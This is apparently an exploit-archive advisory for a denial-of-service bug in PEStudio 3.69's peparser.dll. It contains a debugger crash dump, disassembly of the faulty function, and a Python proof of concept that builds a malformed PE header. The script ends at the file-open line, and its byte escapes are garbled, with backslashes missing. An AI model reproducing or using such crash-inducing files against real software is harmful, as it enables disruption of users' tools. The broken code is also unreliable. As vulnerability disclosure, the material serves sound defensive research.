[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PEStudio 3.69 - Denial of Service
# Published : 2013-06-05
# Author :
# Previous Title : Baby FTP Server 1.24 - Denial Of Service
# Next Title : PEiD 0.95 - Memory Corruption POC

# Title: PEStudio Version 3.69 Denial of Service
# Date: 5th June 2013
# Author: Debasish Mandal ( https://twitter.com/debasishm89 )
# Blog : http://www.debasish.in/
# Software Homepage: http://www.winitor.com/
# Version: PEStudio Version 3.69
# Tested on: Windows XP SP2 / Windows 7
# Vendor Patch : Recently released stable version (v6.91) is not affected.

[+] Affected Module : peparser.dll version 3.69
[+] Crash Point:
(6b4.17c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=41414141 ecx=013f41d9 edx=013f0080 esi=00000000 edi=00004141
eip=3001ce70 esp=0012d15c ebp=00a26100 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:Documents and Settingsdebasish mandalDesktopToolsPeStudio369PeParser.dll - 
3001ce70 8b510c          mov     edx,dword ptr [ecx+0Ch] ds:0023:013f41e5=????????
0:000> u eip
3001ce70 8b510c          mov     edx,dword ptr [ecx+0Ch]
3001ce73 3bda            cmp     ebx,edx
3001ce75 7209            jb      PeParser!PeParser::IPeParserFactory::Destroy+0xf1e0 (3001ce80)
3001ce77 8b6908          mov     ebp,dword ptr [ecx+8]
3001ce7a 03ea            add     ebp,edx
3001ce7c 3bdd            cmp     ebx,ebp
3001ce7e 720c            jb      PeParser!PeParser::IPeParserFactory::Destroy+0xf1ec (3001ce8c)
3001ce80 46              inc     esi
[+] IDA Pro Snap of the Buggy Function:(Code from peparser.dll version 3.69)

.text:3001CE40 sub_3001CE40    proc near               ; CODE XREF: sub_30003510+154p
.text:3001CE40                                         ; sub_300184D0+4Bp
.text:3001CE40                 mov     ecx, [ecx+4]
.text:3001CE43                 xor     eax, eax
.text:3001CE45                 test    ecx, ecx
.text:3001CE47                 jz      short locret_3001CE91
.text:3001CE49                 mov     edx, [ecx+1Ch]
.text:3001CE4C                 movzx   ecx, word ptr [edx+14h]
.text:3001CE50                 lea     ecx, [ecx+edx+18h]
.text:3001CE54                 test    ecx, ecx
.text:3001CE56                 jz      short locret_3001CE91
.text:3001CE58                 test    ebx, ebx
.text:3001CE5A                 jz      short locret_3001CE91
.text:3001CE5C                 push    esi
.text:3001CE5D                 push    edi
.text:3001CE5E                 movzx   edi, word ptr [edx+6]
.text:3001CE62                 xor     esi, esi
.text:3001CE64                 test    edi, edi
.text:3001CE66                 jle     short loc_3001CE8F
.text:3001CE68                 push    ebp
.text:3001CE69                 lea     esp, [esp+0]
.text:3001CE70 loc_3001CE70:                           ; CODE XREF: sub_3001CE40+46j
.text:3001CE70                 mov     edx, [ecx+0Ch]    <-- Crash
.text:3001CE73                 cmp     ebx, edx
.text:3001CE75                 jb      short loc_3001CE80
.text:3001CE77                 mov     ebp, [ecx+8]
.text:3001CE7A                 add     ebp, edx
.text:3001CE7C                 cmp     ebx, ebp
.text:3001CE7E                 jb      short loc_3001CE8C
.text:3001CE80 loc_3001CE80:                           ; CODE XREF: sub_3001CE40+35j
.text:3001CE80                 inc     esi
.text:3001CE81                 add     ecx, 28h
.text:3001CE84                 cmp     esi, edi
.text:3001CE86                 jl      short loc_3001CE70
.text:3001CE88                 pop     ebp
.text:3001CE89                 pop     edi
.text:3001CE8A                 pop     esi
.text:3001CE8B                 retn
.text:3001CE8C ; ---------------------------------------------------------------------------

[+] Proof of Concept :

# /usr/bin/python
header = "MZ"
header += "A"*58
header += "x80x00x00x00"
header += "A"*3
header += "x0e"
header += "A"*60
header += "PE"
header += "A"*235
f = open('POC.exe','wb')